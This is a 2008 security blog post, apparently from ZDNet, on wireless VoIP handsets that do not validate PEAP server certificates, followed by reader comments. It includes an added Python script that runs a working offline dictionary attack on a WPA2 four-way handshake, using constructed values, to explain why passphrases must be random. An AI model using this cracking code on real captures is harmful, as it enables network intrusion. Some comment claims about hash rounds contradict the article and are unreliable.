Design flaw in wireless VoIP handsets endanger the enterprise


Summary: Update 2/23/2008 - Cisco confirms vulnerability in 7921 Wi-Fi IP phone. Security-conscious businesses and organizations that have implemented 802.1x/EAP enterprise-grade authentication are at risk with certain implementations of wireless LAN VoIP handsets.


Update 2/23/2008 - Cisco confirms vulnerability in 7921 Wi-Fi IP phone

Security-conscious businesses and organizations that have implemented 802.1x/EAP enterprise-grade authentication are at risk with certain implementations of wireless LAN VoIP handsets.  I have verified that Vocera Communications is one of the vulnerable vendors, and I have heard from other security researchers that Cisco's wireless VoIP handsets have this design flaw as well.  I'm trying to get official responses from Vocera and Cisco.  Vocera's own PDF documentation (page 55) contains the following admission.

PEAP is a two-part protocol. In the first part, an authentication server and a client set up an encrypted Transport Level Security (TLS) tunnel. The badge accepts a certificate from the authentication server, but does not validate it because of the processing overhead required.

From a security standpoint, this is a reckless design decision that undermines the whole purpose of using strong EAP authentication with asymmetric cryptography in the first place.  Server certificate validation is the only step in PEAP that tells the client who is on the other end of the TLS tunnel; skipping it effectively reverts 802.1x PEAP authentication to the insecure level of Cisco's proprietary LEAP.  What this means is that the client (the wireless VoIP phone in this case) simply assumes that whatever access point and backend authentication infrastructure it is talking to are authentic, because checking the certificate was deemed too expensive.  Note that this check is performed once per EAP authentication (on association, and on roaming when no key caching is in use), not per packet, so the "processing overhead" being avoided is a one-time cost per login.

Because the server certificate is not validated, an attacker can stand up a rogue access point with the same SSID and a rogue RADIUS server presenting any certificate at all, and the handset will build its "protected" TLS tunnel straight to the attacker and run the inner authentication inside it.  With the usual PEAP inner method (MS-CHAPv2), what the attacker collects is the challenge/response pair, which is computed from the hash of the user's password and can be attacked offline with a dictionary; in effect, the hashed password has been handed over in the clear.  Because the strength of that hash depends solely on the length and complexity of the password, the kind of passwords users actually choose typically can't withstand an offline dictionary attack for more than a few hours.  Some inner EAP methods (EAP-GTC, for example) don't hash at all, and in those cases the password is exposed immediately as clear text.  The username is already known to the same attacker, since it is sent in the clear in the outer EAP identity exchange and in any case appears inside the tunnel the attacker now terminates.  Once the password is cracked, the attacker not only has the means to enter the network, they have the user's credentials to access every server and application that accepts them.  From a security standpoint, this is a worst-case scenario.  If Domain Admin credentials were compromised in this manner, the keys to the kingdom would be gone.

Temporary workarounds: Do not use 802.1x/EAP authentication on vulnerable clients that don't perform certificate checks; use WPA-PSK on these embedded devices instead.  WPA-PSK mode is also much faster for these computationally-challenged embedded devices, which cuts down on startup and roaming times.  Keep in mind that WPA-PSK is not immune to offline attack either (the four-way handshake can be captured and the passphrase guessed offline), which is why the PSK itself must be random, as discussed below.  If you have to use LEAP, certificate-unverified PEAP, or certificate-unverified EAP-FAST, you have to assume that the password hash can be exposed to an attacker.

Note: LEAP makes zero effort to protect the hashed password: its MS-CHAP challenge/response exchange is sent in the clear, so a passive sniffer gets it without even needing a rogue access point.  Many deployments of EAP-FAST are fundamentally weak because they rely on anonymous in-band PAC provisioning, in which the server is not authenticated during provisioning, so anyone can play the server and hand the client a PAC.  PEAP can be secure if it is implemented and deployed correctly: the client must verify that the server certificate chains to the specific CA the organization trusts for this purpose (not just any CA in a store), must check that the certificate's subject (server name) matches the expected authentication server, and must not let the user simply accept an unknown certificate.

If you still have to use these vulnerable clients in this vulnerable EAP implementation, then the password you use has to be long and random so that an offline dictionary attack is no cheaper than brute force.  Each uniformly random character drawn from the 62-character alphanumeric set contributes about 5.95 bits of entropy, so a random 22-character alphanumeric password gives roughly 128 bits, and a random 32-character one (a comfortable safety margin) gives about 190 bits.  If 64 bits of entropy is enough, a random 11-character alphanumeric password will suffice and 16 characters gives about 95 bits.  These figures assume every character is chosen uniformly at random by a proper generator, not by a person; a password built from words or patterns has far less entropy than its length suggests.  Special characters are not recommended since they may cause compatibility problems with some wireless infrastructure or devices, and the keypads on mobile devices may not be able to enter them.
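The following calculator, added here as an example and not taken from the original article or from any vendor's software, works out the entropy behind the sizing advice above and what it buys against an offline guessing attack versus a throttled online one (the 45 million guesses per second and 3 logins per hour figures are the ones quoted in the comment thread and are assumptions, not measurements). It also shows how a random secret should be generated, with the `secrets` module rather than `random`.

```python
"""Password/PIN entropy and guessing-cost calculator.

Added example. Guess rates passed in are assumptions for illustration.
"""
import math
import secrets
import string

ALNUM = string.ascii_letters + string.digits   # 62 symbols, the article's alphabet
DIGITS = string.digits                         # 10 symbols, for handset PINs


def entropy_bits(alphabet_size: int, length: int) -> float:
    """Entropy in bits of a string of `length` symbols drawn uniformly at random."""
    return length * math.log2(alphabet_size)


def min_length_for_bits(alphabet_size: int, target_bits: float) -> int:
    """Smallest length whose entropy reaches `target_bits`."""
    return math.ceil(target_bits / math.log2(alphabet_size))


def expected_seconds_to_guess(bits: float, guesses_per_second: float) -> float:
    """Expected time to find a uniformly random secret: half the keyspace on average.

    Works for an offline attack (tens of millions of guesses per second against
    a captured hash) and for an online attack (a few guesses per hour once the
    account lockout or throttling policy is applied).
    """
    keyspace = 2.0 ** bits
    return keyspace / 2.0 / guesses_per_second


def expected_years_to_guess(bits: float, guesses_per_second: float) -> float:
    return expected_seconds_to_guess(bits, guesses_per_second) / (365.25 * 86400)


def random_secret(alphabet: str, length: int) -> str:
    """CSPRNG-generated secret. Never use `random` for this."""
    return "".join(secrets.choice(alphabet) for _ in range(length))


if __name__ == "__main__":
    offline_rate = 45e6          # assumed: slow PC attacking a captured hash offline
    online_rate = 3 / 3600.0     # assumed: throttled to 3 attempts per hour
    pin_bits = entropy_bits(len(DIGITS), 6)
    print(f"6-digit PIN: {pin_bits:.1f} bits")
    print(f"  offline at 45M/s: {expected_seconds_to_guess(pin_bits, offline_rate):.3f} s")
    print(f"  online at 3/hour: {expected_years_to_guess(pin_bits, online_rate):.1f} years")
    for target in (64, 128):
        n = min_length_for_bits(len(ALNUM), target)
        print(f"{target} bits needs {n} random alphanumeric chars, e.g. {random_secret(ALNUM, n)}")
```

The two rates make the article's point concrete: the same 6-digit PIN that survives a lockout-throttled online attack for decades falls in a fraction of a second once the hash is in the attacker's hands, which is exactly what an unverified PEAP server gives them.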

If you're using WPA-PSK, you can reasonably use a random 10-16 character alphanumeric PSK (Pre-Shared Key) passphrase, because a dictionary attack against WPA-PSK is extremely time consuming and CPU intensive: the key is derived from the passphrase with 4096 iterations of PBKDF2-HMAC-SHA1, salted with the SSID, so every guess costs thousands of hash operations and precomputed tables only work for one SSID.  One downside to WPA-PSK is that every client uses the same PSK, so if you lose one of those devices configured with the PSK, you have to re-key every client device.  The other downside to WPA-PSK mode is that a compromised PSK allows the attacker to decrypt other WPA-PSK sessions that use the same key, since the per-session keys are derived from the PSK plus values (nonces and MAC addresses) that are sent in the clear in the four-way handshake.  There is a way to get around these two shortcomings by using Dynamic PSK mode from Ruckus, which uses a very practical and effective per-client PSK, but that's only for the Ruckus products.
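To show what "CPU intensive" and "decrypt other sessions" mean in practice, here is an added example (not code from the original article, nor from Vocera, Cisco or Ruckus) that derives the WPA/WPA2 PMK and PTK the standard way and runs an offline dictionary attack against a captured four-way handshake. The "capture" (SSID, MAC addresses, nonces, EAPOL-Key frame and its MIC) is constructed in-process with a deliberately weak passphrase so it runs offline; a real attacker would pull the same fields from message 2 of a sniffed handshake. The one external check is the 802.11i test vector for PBKDF2 (passphrase "password", SSID "IEEE").

```python
"""WPA/WPA2-PSK key derivation and an offline dictionary attack on a
four-way handshake. Added example; all sample values are constructed.
"""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    # 802.11i: PSK = PBKDF2-HMAC-SHA1(passphrase, SSID as salt, 4096 iterations, 32 bytes).
    # The iteration count is what makes each guess expensive; the SSID salt is
    # what makes precomputed tables SSID-specific.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid, 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    # 802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || counter), concatenated.
    out = b""
    counter = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # Pairwise Transient Key for CCMP: KCK(16) || KEK(16) || TK(16). Everything
    # besides the PMK here is visible on the air, which is why one leaked PSK
    # lets an attacker derive every client's session keys.
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    # WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC field zeroed)[:16].
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_psk(ssid, aa, spa, anonce, snonce, eapol_zeroed, captured_mic, wordlist):
    """Offline attack: passphrase -> PMK -> PTK -> MIC per candidate, compare to capture."""
    for candidate in wordlist:
        kck = ptk_from_pmk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_zeroed), captured_mic):
            return candidate
    return None


# --- constructed sample "capture"; every value below is made up for the demo ---
SSID = b"ExampleCorp-Voice"
AA = bytes.fromhex("001122334455")           # access point MAC
SPA = bytes.fromhex("66778899aabb")          # handset MAC
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
# Placeholder EAPOL-Key message 2 with its 16-byte MIC field already zeroed.
EAPOL_ZEROED = bytes.fromhex("0103005f") + bytes.fromhex("02010a00") + b"\x00" * 91
REAL_PASSPHRASE = "voicepass1"               # weak: it is in the attacker's wordlist
WORDLIST = ["password", "Welcome1", "vocera123", "voicepass1", "cisco7921"]


def demo_handshake():
    """Compute the MIC a handset would send, then recover the PSK from it offline."""
    pmk = pmk_from_passphrase(REAL_PASSPHRASE, SSID)
    ptk = ptk_from_pmk(pmk, AA, SPA, ANONCE, SNONCE)
    mic = eapol_mic(ptk[:16], EAPOL_ZEROED)
    return crack_psk(SSID, AA, SPA, ANONCE, SNONCE, EAPOL_ZEROED, mic, WORDLIST)


if __name__ == "__main__":
    print("recovered PSK:", demo_handshake())
```

Time the loop with a few thousand candidates and compare it with a plain hash per guess: the 4096-iteration PBKDF2 is the whole reason a 10-16 character random PSK holds up where a LEAP or unverified-PEAP password of the same length does not. Once `crack_psk` succeeds, `ptk_from_pmk` with another client's MACs and nonces from its own handshake yields that client's keys too, which is the second downside described above.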

Conclusion: Until these design flaws in the client-side PEAP and EAP-FAST implementations are fixed, users will not be able to safely use the reasonably short passwords they currently use in authentication directories such as Active Directory, or the short PINs they use with their phones.  Even once these flaws are fixed, the computational resources required for certificate validation may make these embedded devices too slow for roaming if a full EAP exchange is needed on every roam.  Fortunately, the PMK caching and pre-authentication features in the WPA2 standard let a client skip the full EAP exchange when moving between access points, so the certificate check is paid once rather than on every roam, permitting seamless roaming if your infrastructure and clients support it.

Topics: Unified Comms, Mobility, Networking, Security, Wi-Fi


Talkback

19 comments
  • Hacked through a Headset?

    I don't know if I want to be embarrassed if such a thing happened. At times we have to admit, "Wired is better"
    nucrash
    • Not a headset, a wireless LAN communicator or handset

      Not a headset, a wireless LAN communicator or handset. These things are basically mini-computers running an embedded OS with a SIP client. The client basically takes a server's word that it's legitimate and is too willing to hand over hashed pins or passwords. If you got a 16-32 character alpha-numeric password or a longer numeric pin, then you're safe since it would be as hard to crack the password as it is to brute force the crypto.

      That's not very usable though since most people want to be able to use a 6-digit pin which provides one million combinations. If you force the attacker to do an online attack, even 10,000 combinations becomes impractical since you can lock the account out. But with a dictionary attack on the hash, 45 million combinations can be scanned in a single second on a slow computer.
      georgeou
      • How many actually use Account Lockout though?

        I know with many financial firms, this is almost required, but with some lesser concerned firms, this is probably over looked. I think the reality comes into play when you look at less than common attack vectors. Why attack through the front door with an army when a single saboteur can sneak in the back and do much more damage.

        Wasn't the Websense guy going on about new attack vectors?
        nucrash
        • Not implementing account lockout or throttling is reckless

          Not implementing account lockout or throttling is reckless. At the very least, you need something that slows the rate at which you can log in to 3 times per hour. That would take you an average of 19 years to guess the right 6-digit numeric pin and it would be obvious from the logs that someone is trying to break in through trial and error.
          georgeou
  • When will the consumer stop...

    this madness? Start suing these companies that put your livelihood at risk and this would all stop!
    bjbrock
    • It won't stop until the media starts treating every company like Microsoft

      It won't stop until the media starts treating every company like Microsoft. Right now, the press and the public only make a big deal out of Microsoft issues but they pretty much let everyone else pass. As a result, all these other companies get to behave the way Microsoft behaved in the 90s and early 2000s and they're not going to clean up their act.
      georgeou
    • the consumer will never stop...

      The consumer is generally a moron. He goes about his business without a care in the world. He probably won't get his voip headset hacked because he's really not that important, even if he was, he might still be lucky.

      So, it's really up to the techs to get these issues addressed. If need be, involved parties would push to have products removed from the market.

      In any case, suing a company in a class action lawsuit would be ideal only if there were reasonable grounds. In this case, I don't think the consumer was misled or misinformed, so no case.

      In retrospect, imagine all of the security and safety flaws that potentially exist in most products. If it was that important to address them all ... OR ELSE, then we'd be crouched naked in the woods waiting for GOD to save us.
      scofrezo
      • It's not the headset being hacked, it's the handset disclosing user credent

        It's not the headset being hacked, it's the handset disclosing user credentials for network and server login. That's extremely dangerous.
        georgeou
  • RE: Design flaw in wireless VoIP handsets endanger the enterprise

    George, it appears that one of the chief potential problems is with implementations of Vocera that follow the vendor's recommended "best practice." In such a case, a company will end up with ONE common user id, ONE common password, ONE common PAC file for ALL of the deployed devices (in some cases 400+ devices).

    On the computational front, computational power increases constantly, in concert with hackers constantly improving their routines. When vendors such as Vocera address security concerns of major customers with less than complete implementations of existing standards, they potentially expose their customers to unnecessary risk . . . and yes, it's probably because not enough people are paying attention.
    martin.maher@...
    • Good points. If you're going to use one password, then just use WPA-PSK

      "In such a case, a company will end up with ONE common user id, ONE common password, ONE common PAC file for ALL of the deployed devices (in some cases 400+ devices)."

      Good points. If you're going to use one password, then just use WPA-PSK. Why bother with all that computational overhead if you're just going to use one key? WPA-PSK works very well and it's much harder to brute force since it uses a hundred rounds of SHA-1 to hash the password.
      georgeou
      • using WPA-PSK . . .

        George: This presumes that our standard wireless network deployment currently supports WPA-PSK. Additionally, it is against security policy, for very good reasons, to use common usernames and passwords. This creates a situation where, as you pointed out in your original article, once the single user name | password pair is compromised, it's reconfigure everything time. The solution, as I believe your article was originally attempting to point out, is to demand better security from vendors.
        martin.maher@...
        • I said if you're going to use one LEAP/PEAP password, then just use WPA-PSK

          I said if you're going to use one LEAP/PEAP password, then just use WPA-PSK since it's MUCH more secure. You're talking about one round of MD5 hashing versus 100 rounds of SHA-1 along with a working salt, making it far more difficult to brute force a WPA-PSK key than a LEAP or broken-PEAP key.
          georgeou
  • RE: Design flaw in wireless VoIP handsets endanger the enterprise

    To be fair, ALL OF America operates on a "moronic" level when it comes to security, especially with technology. Case in point: How many of you reading this post routinely send ONLY encrypted email messages as a matter of policy? I would wager that none of you do- because if you did 99% of your intended recipients would be clueless how or just not motivated enough to decrypt it. I tire of the "I've got nothing to hide" excuse because it's costing all of us REAL money! When just one person gets their password stolen, identity jacked, bank account emptied WE ALL PAY. How? In many ways not the least of which is the VERY real cost that banks and other institutions pass along to us when they realize they have to upgrade their systems.

    I was astounded at just how much sensitive information that I routinely get and send via email. When you realize that ISP's are required by law to archive a minimum time-frame of EVERYTHING that goes through their servers, you have to ask yourself, just who and how is this archived data protected?

    The problem is HUGE and we're just seeing the tip of the iceberg.
    turbohawk
    • This should not be compared to sending unencrypted email

      This should not be compared to sending unencrypted email. Email typically can't be sniffed without control of the network infrastructure. That may be wide open in an unsecured wireless LAN but it's not so easy in most other situations.

      This is talking about a potential backdoor in to an enterprise network.
      georgeou
  • RE: Design flaw in wireless VoIP handsets endanger the enterprise

    "By not validating the server certificate, the client's hashed password would be sent in the clear to an attacker trying to hack the network"
    Why can't the client encrypt the password with the cert that was received even if it wasn't validated? Why do you assume the password would be sent in the clear?
    Techref6060
    • Encryption doesn't matter if the guy on other end is the bad guy

      Encryption doesn't matter if the guy on the other end is the bad guy. The only way you know if you're talking to an authentic server is to check the certificate signature and validate it. If you skip that process, you can potentially be setting up a "secure" encrypted session with the bad guy where both of you have the TLS session key to encrypt/decrypt the content. That means you're sending the hashed password to the attacker, which makes it extremely easy to crack open.
      georgeou
  • Bigger issue

    this is just a spin on a blog posted to avert, http://www.avertlabs.com/research/blog/index.php/2008/02/21/can-i-own-your-wireless-network/

    the tool mentioned there demonstrates this attack.
    ryanbachler@...
    • Josh is cool

      I will be writing on that too.

      In this case however, even a correct deployment isn't enough.
      georgeou
  • VPN never had this one-off consumer concern so easy; I would guess.

    Pay scales must be coming down as square footage is going to start moving again for the "GREEN" home customer spends on the depreciation of their property through income averaging to mast higher earnings for at least six years with a 100% return on their investment. Cellular is a legal design feature limited; I have to say that laptops with voip are for surfing at the Cafe'. The abuse as a rotary means to be a rogue operation and recruit pages with cash (spiff) when completing a target has a lot of work to hold law-enforcement responsible and open the court system for the common good as victims. 2007 was the beginning of 'Victimless' Crime in the United States. From my point of view the open abuse is Congress' fault for leading this Country into a Multi-tiered lightspeed social system ie crunching hard on the median income tax payers and posting higher crime from the fear into any means of Socialism to save the growing population. Doesn't affect me I'll be in Heaven below by overtime.
    rtirman37@...